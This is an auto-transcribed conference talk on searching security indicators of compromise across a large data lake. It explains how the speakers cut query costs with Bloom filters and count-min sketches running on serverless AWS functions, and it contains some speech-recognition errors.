 Thank you very much for the introduction and thank you guys for being here in this section So I will skip an introduction. Whoop. We are too far ahead in this presentation Okay, let me get back to the agenda back on track The plan is to basically talk a little bit about indicators of compromise which is a core component in cyber security and then we will describe our legacy infrastructure moving on to a more modern approach and explain why we we should use our leverage and probabilistic data structures to do efficient IOC search Before we start I would like to know if is anyone here familiar with probabilistic data structures. Can you please raise the end? Okay, that's great. So I hope in the end you get Some nice ideas to improve your own systems. Also another question very simple. Who is working in the cybersecurity field? Okay, that's the expected results actually so let's move on So we are part of Zimans more precisely the cybersecurity defense center and our mission is to monitor and also Identify threats so we want to protect Zimans from cyber criminals Since Zimans is such a big company and we have more than 500,000 hosts We have a lot of data. Therefore, we have a monopoly of technologies We run hybrid architecture part of the the systems are on premises other parts on the cloud and We need Running some of them in the cloud in order to scale for this huge amount of data, but I will go deeper next week Cyber security nowadays is a huge thing and because the cyber criminals are really very sophisticated and also well-motivated So a typical organization will care about these detection vectors such as in point security and they will run antivirus for example networking security with fire all and ideas and email or proxy Solutions from specific vendors with spam filters or DJ detection These three detection vectors are quite important But alone they are not enough to keep the organization Protected so it's paramount to combine all of them and Finally, it's also very important to collect Information from these different log source so that you can do post-mortem Analysis and that's the part I want to introduce you which is IOC search So for the ones which are not familiar with cyber security I'm sure you will not understand this so I'm going to give you a brief introduction To this concept and for that I'm going to use a simple analogy Since we are in Madrid. I decided to bring this TV show. I'm sure this one, you know Who knows the TV show of course most of you otherwise you can look into Netflix So these guys were very successful in Rob public organization hearings by an actually in Madrid Imagine now that you were given a task to protect another public institution from these same guys But you don't know if they will attack your institution when you really know nothing You just know what they have been in the past So you cannot also go after them. You can only react to some action You need to defend your organization So you need to have a surveillance system and decide when you will take some action or Alert someone in order to escalate some incident for example to the public authorities And that's basically your mission to do that you need to look into what they have done in the past and Identify these indicators of compromise which could be someone carrying a red jacket and a mask or Wearing already or carrying ropes and guns if you see someone inside your facilities with that or Nearby you can automatically trigger and alert the authorities so they can react in time That's basically the goal of indicators of compromise In cyber security, it's pretty much the same thing So it's evidence that your system or network was already compromised simple examples Ash values of files such as a PDF or a word documents domain names IP address There are more Another important fact that I want to share with you is that there are thousands of new IOCs per day They come from different sources such as public sources private Intel organizations usually now cooperate in order To get more information from different attacks or our in-house cyber professionals, which sometimes can reverse engineering malware samples this simple example There are a lot of suspicious process and one of them is actually encoded payload running in the power shell Security professionals can actually decode that this one is very simple. They just need to use Base 64 decoder and run some reward expressions. There are more examples complicated which they need to go through many layers of encoding but this is quite simple and in the end if you decode you will get plain text and You can extract information such as the domains why those domains are important because you know that the malware will connect to those domains either to extravigate your data or to pull Other malware or more capabilities So what can you do with these indicators? It's quite obvious. You want to pay attention to them every time you see them again You want to react? So you can think this as a twofold problem. You need to think in the future and also in the past If tomorrow I get a new IOC I want to alert someone and we run a streaming engine to take care of that However, this this talk we will focus in the patch in in the past. I'm sorry Okay, we will focus in the past in the past and for that You just need to be to be able to collect and store your historical data And then just run a simple query and try to find if the same URL or domain is there Okay Now I'm going to describe how we were doing this in the past in terms of Infrastructure and why is it was a bad idea and how we involve our infrastructure early 2014 we were running three deployments of a massive parallel database from a specific vendor and This solution was not ideal because We could just handle few days of data if we tried to scale to a couple months It was really hard and was overwhelming our devops because they were investing a lot of engineering time to keep this database Only one more day alive on the other side our stakeholders the security analysts They were not very happy in waiting for queries taking hours so early 2018 we decide to move into the cloud and First step quite obvious is to build a data lake And this is super simple We decide to go with Amazon and there is only two technologies that you really need which is a 3-4 storage and then a computation such as the Amazon Athena so that you can query your data By deploying this solution in terms of implementation super easy. No we no longer have Operations we outsource everything to Amazon basically because we run these fully managed services And our queries are much faster We could also store four times more data, but there is one caveat to that the computation and the pricing model for this computation scales on demand so Every terabyte of data that you scan you will pay $5 so if you do many queries you can go into a problem and In IOC search that's actually a problem because if you just receive one IOC Let's say yesterday and you care you query our data. Let's say your last 90 days You get you get a result. That's fine But as I said before you receive thousands of them and for each one you are querying the same exact data for the same exact time range and this is duplication you can see already here a pattern or a Point that you could potentially improve Worst than that is that you expect your queries to return no values at all meaning that a your Organization is safe or B. You are doing a bad job with monitoring Only a few will return values and you need to take action on that Doing a quick math to get some intuition of the pricing For one IOC 90 days and have a daily average of half terabyte. You will pay 200 dollars But if you have 100 use you will scale linearly to More or less 22k and if we do the math for entire year, that's 80 millions Okay for our big organizations That's nothing because cyber security is one of the first things to worry about and the loss can cause billions of losses, so it's priceless, but still there is There is room for improvement and we decide to move to a third phase which is create specialized layers on top of our data lake to answer these Very specific and well-defined use cases. So we know the pattern. Maybe we can improve naive solutions on one end a naive solution would be to just Change the starting system within Amazon for example for redshift But you are going back again to the same problem of coupling storage and computation So it won't be a good idea and also very mind. We have a petabyte Data lake so a petabyte in data warehouse is extremely expensive Another naive option is why we don't move to another cloud provider such as Google. I heard about something like be query Yeah, those cloud providers are super competitive in terms of pricing So they do exactly the same as Amazon as we're the same So there is no really big app that you can exploit and the final naive option is Starting this information in a key value storage or for example a hash map But these since we have thousands of IOCs per day it will scale linearly and you will run out of memory or storage to query these structures So a better option and in my opinion something that suits very well This use case is using probabilistic data structures And now I'm going to hand over to my colleague John, which will explain you what it is and how you can weather jet Hello, can you hear me? So let's talk a little bit about probabilistic data structures But first let's walk through some notions of big data so Gardner defines big data with the sentence you see on your screen and I would like to point out The highlighted words which define big data dimensions But why do these dimensions matter because? Because okay, sorry. Thank you Okay, so sorry, why do these big data dimensions matter? Because they present technical challenges to our big data use cases There are a lot of parallel computing frameworks that address this technical challenges although has scalability rises in our problems these Frameworks quiver to meet that the big data demands So how can we continue improving our knowledge of the data? How can we continue to learn from it? Well, you have we have to accept a trade-off We need to lose some data, but continue our alert our learning through time And this is exactly what probabilistic data structures are to big data They are they provide fuzzy views fuzzy representations of our data Let's walk through a little bit these dimensions First we have the volume Volume defines the huge amounts of data we generate every day and the volume dimension has problems like membership and counting Membership is just knowing when an element is in the set and counting is just counting the distinct elements in a set For membership we have for instance bloom filters, which we will talk later and for counting for counting cardinality We have hyper log log For variety variety refers to the different data sources and data types. We have in big data Variety dimension has problems like similarity So we measure the similarity between two data sets. We have sim hash and mean hash algorithms for that and finally velocity Velocity refers to how the speed with which we generate Process and analyze big data The velocity dimension has problems like frequency and rank For frequency we can use common sketch When I say frequency I mean counting occurrences of elements in a set And for instance, we can use q digest to address rank with q digest We can estimate statistical quantiles for our data and then sort it out So given this let's talk about a specific structure count mean sketch with cut mean sketch We can efficiently estimate the element frequency in our set this structure is Compressed comparing for instance with other structures with for instance a python dictionary for example This structure is compressed because it uses ashes to store the values a Count mean sketch in a way is similar to a regular hash table because they are both two dimensional arrays But in the content sketch case we think we store sorry fixed size integers in our entries Given this this makes our structure constant in time and space Whilst in our stables The the space complexity is linear so it grows with the elements we are inserted So as you can see count mean sketch seems a very promising option to estimate our element frequency But let's see Let's see how count mean sketch works As I said we have here a two-dimensional array and The dimensions of this two-dimensional array control the accuracy of our counts The number of rows. It's just the number of hash functions. We will apply to an element to generate hash values to Map to the columns of this matrix. So the columns are the range of these as values So, let's see how this works We apply our hash functions to our element and generate hash values in this case the ash values This ash values will map to entries in our matrix Which we will increment in order to insert that element is in our structure in order to query the this structure, it's Basically the same way we grab our ash values and map These two entries in the matrix we retrieve the final value has the minimum of these values And it's the the name of the structure, which is count mean sketch Now, let me present to you a little bit of code Just to show you how easy it is to interact with account mean sketch I am here creating an object with a certain width and depth I am inserting this universe of elements and then I'm checking their counts in the end Let's see what the common sketch gives us and it gives us the correct answer We have seen four times Google.com and two times Facebook.com But now let me present to you a particular behavior with count mean sketch Specifically with near zero Frequent elements so rare elements or non-scene elements Let's say I'm introducing Google.com in our structure Incrementing these entries Then I will insert Facebook.com Incrementing these entries so the final state of the matrix will look something like this and now I will query the structure With some domain.com an element that was never seen before And if the ash values of this some domain.com map to these entries Then count mean sketch will say that some domain.com was seen before when in fact it wasn't This is a behavior. We do not want for our use case because we need low positive rates But this brings us to another probabilistic data structure, which is bloom filter Bloom filter Efficiently estimates membership problems. So efficiently estimates if an element was seen in some set Whilst count mean sketch was a bit to dimensional structure the boom filter is just a bit array Whose length and number of hash function define the bloom filter So those parameters control the probabilities of error in the bloom filter this makes As the as count mean sketch The bloom filter constant in space and time once again comparing with a regular hash table The good thing about the boom filters is that you can tune the false positive rate With the number of hash functions with separate that parameter that Controls the false positive rate Furthermore, we have impossible false negatives. So if you insert an element in your structure, you set its bits to one If you query again for that element, it's impossible that the structure will say that Element has not been seen that is impossible that would be possible if a delete operation was would be possible but The delete operations are not possible in bloom filters because in order to delete an element you need to inset its bits and That might temper the structure because other elements might map to the same entry and you are corrupting the bloom filter So delete operation is not possible within bloom filter now bloom filter Works regularly the same as count mean sketch You have an element You pass it through your hash functions and these map to entries in your array. You set those to one In order to query the same thing you grab your hash values map the entries and return a bitwise end So return one if all val if all values are one zero otherwise now as the same similar snippet of code Regarding bloom filter In order to show you again that is fairly easy to interact with these structures, so I am creating a bloom filter With a certain capacity and error rate The capacity and error rate will derive the dimensions of the array I'm inserting this universe of elements, which is google.com and facebook.com And you might ask why am I inserting google.com two times? Well in the insert operation bloom filter We have hidden potency So if we insert the same elements well same element twice we'll have the same outcome because we are just Setting bits so if we insert google.com we set its bits to one and if we insert again We just setting the same bits to one so the outcome will be the same and in the end I am querying for google.com and facebook.com that we know that we saw and some domain some random domain That was not in our universe So the bloom filter answers this which is correct according to the universe of elements we saw before Now that I've introduced Introduced sorry a little bit the probabilistic data structures Let's talk about how we leverage them to our use case In terms of hardware, what did we chose and why? Well, we wanted a cost-effective solution We wanted to save money So to do this We committed ourselves to serverless architecture and when you talk about serverless architecture Cheap compute services in the cloud, especially in AWS. You talk about AWS lambda functions Although lambda functions have limited storage So we need to be careful when designing our probabilistic data structure back-end But let's see the facts of what we learned so far bloom filters can answer With a 100% accuracy if an element was not seen and Can answer with a high probability that an element was seen in this case an IOC The common sketch can estimate how many times that IOC was seen Well, why won't we just join these two structures and leverage the best of them to our use case? By doing this, we can even only store one at a time at the lambda storage device Meaning that we can increase our structures in such a way that we only want to fit at the time in the lambda storage device So given this let's see how this would work Let's say I'm asking how many times when was some IOC seen sometime somewhere ago Somewhere some time ago Well, let's first ask the bloom filter and the bloom filter will state if it was seen with a probability of 99.9 percent If the boom filter answers negative, well, there's nothing else to do We just return where I haven't seen this IOC But if the answer is positive, well, just ask the count mean sketch How many times approximately this IOC was seen and by having this architecture We only need one structure at a time in our lambda function But now How can we dimension our structures? We have our back end, but we need dimensions for the bloom filter and the cut mean sketch For that we need to know a little bit about the cardinality of our IOC's and The only ground truth. Let's say like that. We have for this. It's our data lake So in order to correctly estimate the cardinality of our of our IOC's Let's use our data and query values of cardinality for some representative days representative days can be something like Days with huge traffic in order to have a bigger upper bound for the cardinality With these values we compute the average and the standard deviation and after that we leverage Property from normal distribution, which is the 68 95 99.7 rule and you ask what the hell is that? Well, it's just a rule that states that Percentage of values is within a band around The mean what I mean is for instance in the image you have 68 point two 27% of the values are within the average minus standard deviation and the average plus a standard deviation so let's lever this leverage this for us and estimate our cardinality a cardinality to be Average plus three times the standard deviation with this We cover a huge range of possible cardinality values and we do not saturate our probabilistic data structures If for some reason this this value generates Probabilistic data structures that might not fit our lambda storage Well, just decrease the factor and we'll still have approximately 95.45 percent After that we just perform a benchmark to see the correct dimensions to check the correct dimensions for our desired accuracy Now we have our back-end we know how to dimension our structures now we need to know how to scale them Our data lake is partitioned by day in order to serve serve the queries in WS Athena since we are Representing our data in a fuzzy way. Well, let's do the same. Let's partition them by day and by doing this We can paralyze operations. We can scale limitlessly because we have a structure each and every day The probabilistic data structures do not saturate because each day is a new probabilistic data structure And if for some reason they might saturate we can always estimate again the cardinality and the dimensions and Adapt and that from day from that day one the structures will have adapted dimensions to the new IOC cardinality now given the Theory and what we use about probabilistic data structures. Let's present an architecture Diagram has protocol demands. So we have two phases in our architecture query time query phase and update phase This works like this the client calls the API which is which was built using API gateway and This API gateway calls an entry point on the function that will trigger the logic to query to To query the probabilistic data structures all that logic of asking first the bloom filter And then the count mean sketch is within our orchestration service Which is a double step functions that is the surface that coordinates the application logic in order to serve the query If for some reason Consulting the probabilistic structures fail. Well, then we just fell over to Athena as before for reliability of our application In the update phase since we have a fuzzy view of the data We need to be synchronized with it at least in time So as we ingest data we synchronize our probabilistic data structures with that ingestion using again an orchestration service With this logic to update the probabilistic structures so after this Presentation of what we Designed and implemented. Let's see what outcome did we have of this? Well, this is these are metrics regarding our service we have data scan the cost and the requests and We have three months of the yield implementation We have a migration period and the go live period and as you see as we deployed this new Implementation our costs and data scans started to decrease More precisely they decreased each 24 times Furthermore in order to achieve this cost reduction reduction We did not need to limit our service limit our service requests We did this without any service downgrade Now in order to finish the timeline we saw before We designed a specialized solution to this use case Which is the IOC search using probabilistic data data structures Which resulted in? Lightning lightning fast queries. So we query in less than a minute petabytes of data and In terms of overall costs we reduced nearly 75% our costs our costs per year So in overall we are very happy of the outcome with the outcome of this Implementation so in order to finish let me show you what did we take away during this journey? probabilistic data structure fit a wide range of big data use cases Because they tackle the technical challenge the tail challenges that the big data poses In order to use probabilistic to the structures and answer more complex questions you can assemble probabilistic data structures and Target your demands in terms of use cases. That's what we did in ours and Finally probabilistic The structures are space and memory efficient So to finish and to the big lesson we took from this is that if you smart engineer your Applications you can save a lot of money in big data and cloud realm. Thank you very much If you have any questions We are here for you, please Yeah, thank you for the for the chat. It was very interesting Sorry, oh sorry Can you tell us? How do you store the pds in Amazon like in which data structure like Dynamo DB or SQL or something like this. No, we sort in the in the lambda storage device I said you in the long itself in the long itself. Yeah. Yeah To be more precise They are on S3 and then you pull into the lambda container when you want to query them because you also need to update them So you need it needs to be available for both cases. Oh, it makes sense. Thank you and just some values in terms of storage these Representations as wrong was saying these fuzzy representations. They are like around 200 megabytes. So that's enough to represent a huge cardinality for a specific day or month So I may have a final question. Sorry if I may anyone with good ideas to implement on Your organizations or pets projects, whatever can you please raise the end? Okay, I see some hands Cool. Cool. Thank you guys. Thank you very much guys. Bye. Thank you